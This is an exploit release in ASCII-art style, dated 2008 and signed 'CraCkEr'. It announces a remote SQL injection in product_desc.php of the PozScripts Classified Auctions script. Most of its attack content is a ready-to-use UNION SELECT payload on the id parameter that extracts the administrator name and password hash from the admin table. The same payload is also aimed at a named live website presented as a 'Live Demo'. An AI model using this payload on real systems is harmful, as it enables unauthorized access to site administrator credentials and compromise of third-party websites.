The PozScripts Classified Ads Script suffers from a remote SQL injection vulnerability in product_desc.php.
bd93374f038ba112535b6063c0f0d33c0ec3bff7f239eaeafcbaa9e3d1e9dd77
┌┌────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Remote SQL Injection ] ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr : : :
│ Group : N/A │ │ │
│ Script : Classified Auctions Script│ │ Register Globals : │
│ Download : pozscripts.com │ │ │
│ Critical : High [░░▒▒▓▓██] │ │ [█] ON [ ] OFF │
│ │ │ │
│ ─────────────────────────────────────┘ └─────────────────────────────────── │
│ DALnet #crackers ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌────────────────────────────────────────────────────────────────────────────┐
┌┘ Exploit URL's ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
[SQL]
www.localhost/product_desc.php?id=-1 UNION SELECT 1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 FROM savoirs_militaria.freetplauctions_admin--
Live Demo:
http://bourses-aux-armes.com/product_desc.php?id=-1 UNION SELECT 1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 FROM savoirs_militaria.freetplauctions_admin--
└─────────────────────────────────────────────────────────────────────────────┘
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X .
┌┌────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2008 ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘